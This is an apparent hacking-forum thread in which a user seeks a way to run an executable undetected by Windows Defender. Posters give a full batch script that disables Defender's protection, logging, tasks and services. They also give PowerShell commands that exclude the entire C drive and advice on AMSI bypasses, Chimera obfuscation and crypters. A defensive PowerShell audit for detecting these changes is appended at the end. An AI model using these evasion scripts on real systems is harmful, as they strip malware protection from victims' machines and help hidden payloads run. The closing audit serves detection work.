Batch Script for Windows Defender Exclusion - Looking for it

xcrew1990

I'm looking for a batch script that can bypass Defender and exclude the whole "C" partition from it permanently. Need to run an exe undetected.
Seems the usual powershell.exe -command "Add-MpPreference -ExclusionExtension exe" is being detected nowadays.
 
Code:
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
rem 0 - Disable Logging
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
rem Disable WD Tasks
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
rem Disable WD systray icon
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
rem Remove WD context menu
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
rem Disable WD services
rem For these to execute successfully, you may need to boot into safe mode due to tamper protect
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem added the following on 07/25/19 for win10v1903
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
 
Can I PM you? You seem very knowledgeable in coding, especially encryption, and I need to get some answers or a small guide.
 
Code an AMSI bypass in .NET, then do a CLR Invoke from PowerShell with the .NET bytecode. Use Chimera on the PowerShell CLR Invoke script plus a simple custom PowerShell crypter, or use betterxencrypt.ps1 and then Chimera again.

And you can sneak in any PowerShell code on it afterwards, including the Add-MpPreference exclusion.
 
I'm not experienced; would you mind showing me on Telegram for a fee? Please send me a PM.
 
I was about to type what you just said, but I want a loader that would do that and then, after a few minutes, execute another exe.
 
This will only work on older versions of Windows, anything below Windows 10; any build after that has tamper protection enabled by default, which makes this not possible. Tamper protection blocks reg edits or the use of MpPreference/all command-line options to change Defender settings. PowerShell still works fine on any system without tamper protection. No need for a .bat file, which is easier to detect than a command.
 
So how do you bypass Defender permanently?
 
Editing the registry, or adding an exclusion via PowerShell, works on all versions, at least on the server versions, and on Windows 10 it works with admin rights.

And disabling Defender makes no sense at all, and it's conspicuous; it's better to just add the whole drive to the exclusions and that's it.
Adding the entire disk using Add-MpPreference is being blocked by the latest Defender. Any other way?
 
Code:
1)
Add-MpPreference -ExclusionPath "C:\"
2)
Set-MpPreference -ExclusionPath "C:\"
3)
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -Force
4)
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\" -PropertyType String -Force
5)
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C_Drive" -Value "C:\"
6)
powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"
 
If the account has admin rights, the drive will be added to the exclusions.
 
All of this is detected by latest defender Win 10
Like I said, it won't work on most systems with Windows 10 or higher; they are tamper protected!

You can probably execute these through a PSRemoting session without tripping Defender, but if you're trying to do it through cmd over SMB then Defender will block you every time. But if tamper protection is enabled they won't work anyway. Run "Get-MpComputerStatus" and look at whether "IsTamperProtected" is set to true. If the value is true you won't be able to add exclusions or disable Defender over the command line anyway; you will have to use the GUI to disable tamper protection first. I haven't seen a Windows 10/11 machine or Server 2019 or 2022 or > build 1809 without tamper protection enabled in a long time.

If executing with cmd instead of PowerShell, use ' powershell -c "Get-MpComputerStatus" ' instead.

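The reply above points at Get-MpComputerStatus and IsTamperProtected as the deciding check. As an added example, written here for this thread and not posted by any participant, the PowerShell audit below lets an administrator confirm that state and flag the exact changes the scripts earlier in the thread make: drive-root or .exe exclusions, the policy values under HKLM\Software\Policies\Microsoft\Windows Defender, Defender services set to Disabled, and recent configuration-change events. It assumes an elevated session on a host with the Defender module present; the 7-day event window is an arbitrary choice.

```powershell
# Added defensive audit for this thread (not from any poster). Run elevated.
$findings = @()

# 1) Engine state, including the tamper-protection flag discussed above.
$status = Get-MpComputerStatus
if (-not $status.IsTamperProtected)        { $findings += 'Tamper Protection is OFF' }
if (-not $status.RealTimeProtectionEnabled) { $findings += 'Real-time protection is OFF' }
if (-not $status.AntivirusEnabled)          { $findings += 'Antivirus engine reports disabled' }

# 2) Exclusions: a whole drive root (e.g. "C:\") or the .exe extension means
#    nothing under it is scanned.
$pref = Get-MpPreference
foreach ($p in @($pref.ExclusionPath | Where-Object { $_ })) {
    if ($p -match '^[A-Za-z]:\\?$') { $findings += "Drive-root exclusion: $p" }
}
if (@($pref.ExclusionExtension) -contains 'exe') { $findings += 'Exclusion for .exe extension' }

# 3) Policy values the reg-add script in this thread writes.
$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
foreach ($v in 'DisableAntiSpyware', 'DisableAntiVirus') {
    $val = (Get-ItemProperty -Path $policy -Name $v -ErrorAction SilentlyContinue).$v
    if ($val -eq 1) { $findings += "Policy $v = 1" }
}
$rtp = Join-Path $policy 'Real-Time Protection'
$val = (Get-ItemProperty -Path $rtp -Name DisableRealtimeMonitoring -ErrorAction SilentlyContinue).DisableRealtimeMonitoring
if ($val -eq 1) { $findings += 'Policy DisableRealtimeMonitoring = 1' }

# 4) Services the script sets to Start=4 (Disabled). Kernel drivers such as
#    WdFilter are not visible to Get-Service, so only Win32 services are checked.
foreach ($svc in 'WinDefend', 'WdNisSvc', 'Sense', 'SecurityHealthService') {
    $s = Get-Service -Name $svc -ErrorAction SilentlyContinue
    if ($s -and $s.StartType -eq 'Disabled') { $findings += "Service $svc is Disabled" }
}

# 5) Defender configuration-change events (ID 5007) in the last 7 days
#    (window is an arbitrary choice for this example).
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id = 5007
    StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue
if ($events) { $findings += "$(@($events).Count) configuration-change events (5007) in last 7 days" }

if ($findings) { $findings | ForEach-Object { Write-Output "FINDING: $_" } }
else { Write-Output 'No Defender tampering indicators found' }
```

Any FINDING line is worth correlating with who changed the setting and when; on a managed fleet the same checks can be pushed as a scheduled compliance script.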
 